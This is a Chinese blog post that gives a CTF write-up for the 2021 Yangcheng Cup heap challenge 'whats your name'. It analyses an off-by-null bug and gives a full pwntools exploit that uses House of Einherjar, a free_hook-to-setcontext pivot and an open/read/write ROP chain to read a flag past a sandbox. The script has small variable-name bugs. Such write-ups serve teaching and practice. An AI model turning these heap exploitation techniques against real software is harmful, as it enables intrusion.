2021羊城杯 pwn whats your name

最新推荐文章于 2022-09-04 19:37:53 发布
最新推荐文章于 2022-09-04 19:37:53 发布
阅读量311 收藏 1
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/120316362
版权

在这里插入图片描述
libc是2.23的。

在这里插入图片描述
保护是全开的。

在这里插入图片描述沙箱是有的。

在这里插入图片描述

菜单。

set name
在这里插入图片描述80是size

84是标志flag

88申请了0x10的chunk。
前八个字节是puts函数
后八个字节是我们的地址。

edit name
在这里插入图片描述显然是能够输入name。

在这里插入图片描述
它用了一个202060来处理输入,但是在处理v5跟j的关系上面会有一个off by null。

puts name
在这里插入图片描述就是输出。

delete name
在这里插入图片描述
delete也删除干净了。

所以说白了就是一个2.23的off by null。
然后因为开了沙箱,所以我们就通过off by null,用house of ein攻击free_hook,改成setcontext+53,做一个堆的SROP

exp

#!usr/bin/env python
#-*- coding:utf8 -*-
from pwn import *

r = process("./name")
elf = ELF("./name")
libc = ELF("./libc.so.6")

def add(size):
    r.sendlineafter("5.exit\n", "1")
    r.sendlineafter("name size:", str(size))   

def dele(idx):
    r.sendlineafter("5.exit\n", "4")
    r.sendlineafter("index:", str(inx))

def edit(idx,name):
    r.sendlineafter("5.exit\n", "2")
    r.sendlineafter("index:", str(idx))
    r.sendafter("name:", name)

def show(idx):
    r.sendlineafter("5.exit\n", "3")
    r.sendlineafter("index:", str(inx))

add(0x100) #0
add(0x100) #1

dele(0)
add(0x30)
show(0)
libc_base = u64(r.recvuntil("\x7f")[-6:] + '\x00\x00') - 0x3c4b78 -0xe0
setcontext_53 = libc_base + libc.sym['setcontext'] + 53
main_arena = libc_base + 0x3c4b78
print "libc_base = " + hex(libc_base)

add(0x10) #2
show(2)
r.recvuntil('\n')
heap_addr = u64(r.recv(6) + '\x00\x00') - 0xad0
print "heap_addr = " + hex(heap_addr)

dele(0)
add(0x48) #0
add(0x100) #3

pay = flat([
    0,0x41,
    heap_addr+0xc8-0x18,heap_addr+0xc8-0x10,
    'a'*0x20,
    0x40
])
edit(0,pay)
edit(3,'a'*0xf0+p64(0x100)+p64(0x121))
dele(3)

add(0x10) 
add(0xa8-0x20)  
add(0xc0) 

srop_addr = heap_addr+0xb30
pay = flat([
    0,0x21,
    setcontext_53,srop_addr
])
edit(0,pay)

p_rdi = libc_base + 0x21112
p_rsi =   libc_base + 0x202f8
p_rdx_rsi = libc_base + 0x1151c9
p_rax_rdx_rbx =  libc_base + 0x1436b1
open_addr = libc_base+libc.sym['open']
read_addr = libc_base+libc.sym['read']
write_addr = libc_base+libc.sym['write']
syscall =  libc_base + 0xbc3f5
ret =  p_rdi+1           

rop_base = heap_addr + 0xc60
edit(5,'\x00'*0xa0+p64(rop_base)+p64(ret))

flag_str_addr = heap_addr  
flag_addr=rop_base+0xd8
ORW=flat([
    p_rdi,flag_addr,
    p_rsi,4,
    p_rax_rdx_rbx,2,4,0,
    syscall,
    p_rdi,3,
    p_rsi,flag_str_addr,
    p_rax_rdx_rbx,0,0x50,0,
    syscall,
    p_rdi,1,
    p_rsi,flag_str_addr,
    p_rax_rdx_rbx,1,0x50,0,
    syscall,
    './flag\x00'
])
edit(1,ORW)
show(0)

r.interactive()
yongbaoii
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通过一道题学习堆栈结合|2021羊城whatyourname
rencvn的划水
03-06 321
羊城比赛队友解出了题,赛后看到其他师傅打栈的思路很好奇,立马做了复现,下面是学习的总结。 例行检查程序 64位程序,保护机制全开,是一个沙箱的题,题目给了libc文件 是2.23的libc,放到ida里分析,可以看出是add()函数。 只允许申请9个堆块,在用户申请堆块前,会先申请一个0x20大小的堆块,存放用户申请堆块的内容指针。还限制了我们最大只能申请0x100的堆块,show()函数 这里是直接调用的,如果没有沙箱,我们就可以通过show函数构造system...
2021羊城 pwn BabyRop
yongbaoii的博客
09-24 250
显然没开啥保护 显然就是个溢出。 显然是个后门函数 显然作用是能把一个字节与异或一个1 显然有个字符/cin/sh 显然用函数2能把/cin/sh变成/bin/sh。 就一套rop带走就行。 exp from pwn import* r = remote("192.168.39.35", 11000) elf = ELF("./BabyRop") payload = 'a' * 44 + p32(0x80491fd) + p32(0x8049332) + p32(0x804c024) + p32(.
2021 羊城 pwn how2heap
yongbaoii的博客
09-24 194
PIE NX RELRO都没开,然后题目说是2.23的libc。 显然是菜单。 add 地址都在bss上面,然后申请到的chunk都是0x20的,前面十个字节实我们可以的输入,再八个字节是输入的大小。 get get函数就是一个输出。 但是我们可以看到在第二个if的时候,result是int类型,所以可以有整数溢出。 del 显然也是一样的问题。 但要注意的是free之后会覆盖上来再凑齐,中间不会留空挡。 而且其实我们注意到这个地方是0x2e,但是前面可以序号一直到0x2f,那么我如果先释放0x.
羊城2021_Re_BabySmc
CHUNJIUJUN的博客
09-21 512
拿到题第一件事查壳、看信息 无壳,64位 IDA,进入主函数 跟进byte_140001085 发现一大推数据,应该是被加密了 IDA动态调试,先F5,然后一路F8,随意输入flag,执行到140001085地址 继续一直F8到出现此对话,Yes 这时程序代码已经自解密了,然后一直按着F8直到程序暂停 重新进行动调,F5,一路F8,随意输入flag后继续F8,F8进去,再F5回去 接着边鼠标向下划边一直按...
[WP]2021羊城-Web部分
Y4tacker的博客
09-14 1820
文章目录写在前面WebCross The SideCheckin_GoOnly 4 (非预期解法)Only 4 (预期解法)NO SQLEasyCurl 写在前面 这次拿了第一还是比较开心的,一晚上没睡觉… Web Cross The Side 版本信息Laravel v8.26.1 (PHP v7.4.15) 目录扫描 应该是开启了redis 联系版本号,尝试debug-rce 既然有file_get_contents与file_put_contents,尝试ftp passivemode 成功出
赣网2021_pwn1.rar
12-11
赣网2021 pwn1 bin ctf
赣网2021_pwn2.rar
12-11
赣网2021 pwn1 bin ctf
安恒pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
强网2022 pwn 赛题解析.docx
12-18
强网
2020YCBCTF:2020羊城官方writeup及
03-24
2020年 2020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
2022羊城pwn wp
N1rvana的博客
09-04 854
2022羊城pwn
[羊城2021]web wp
l11III1111的博客
09-12 1112
[羊城2021]web wp 题目页面进去就是源码,传入两个参数一个用来包含,一个来触发反序列化。 <?php highlight_file('index.php'); error_reporting(0); $gwht= $_GET["gwht"]; $ycb= $_GET["ycb"]; if(preg_match("/flag/",$gwht)){ die('hack' ); } if(preg_match("/secret/",$gwht)){ die('hack' ); }
羊城 2021 web go
F1or_的博客
09-13 254
比赛做不动,靠着赛后复现来学习一下。师傅们tql 一上来就是一个简单的登录页面,题目附件给了源码,打开看看 传入的uname通过text转换为str,一开始我以为是text转换为str的这里可能存在漏洞,上网一搜也没有发现。golang弱比较特性还是比较少,这个方法后面也直接被我排除了,找了好久,哭了。。。 既然这个绕过admin不行,就直接想到修改cookie值来进行身份验证。 全局搜索一下,发现cookie生成代码 这里可以加入一下代码验证一下 但是cookie并没有被解密出来,返还上层发现
CTF-Pwn-[BJDCTF 2nd]secret
归子莫的博客
05-06 1477
CTF-Pwn-[BJDCTF 2nd]secret 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]secret 下载题目文件 secret 思路 老规矩使用file...
2021羊城pwn部分wp
eeeeeight的博客
09-12 6478
前言: 羊城的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*
tuma五道入门pwn题解析
weixin_44113469的博客
03-12 840
0x01 pwn1 只有v5==-559869752 成立,就能输出flag,查看v5位置,直接覆盖。 exp from pwn import * context(os='linux', arch='i386', log_level='debug') p = process('./pwn1.dms') p.recvuntil('What... is your name?\n') p.sendl...
Pwn_0xGame_01
Trick的博客
11-08 536
Pwn_0xGame1.欢迎来到0xGame平台2.帮我取一个题目名称ret2text3.easy_stack4.该怎么起名呢shellcode5.variable_coverage变量覆盖 1.欢迎来到0xGame平台 nc出flag 2.帮我取一个题目名称 ret2text 打开IDA分析 main函数 跟进 第二个函数 s栈大小为20h=32 函数最后return read了s 所以很好写了 因为是64位程序,后面再加上8个字符 payload = 'a' * (0x20+8) Shift+F1
2021羊城 部分CRYPTO WP
机智的钢板的博客
09-13 5616
Bigrsa from Crypto.Util.number import * from flag import * n1 = 10383529640908175186077053551474658681539589842726033432568031364836913266105784068082329551223694895337089556841972133117083455781254146830929881949726774689281458380642302716738282547.
2023 羊城 pwn
最新发布
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值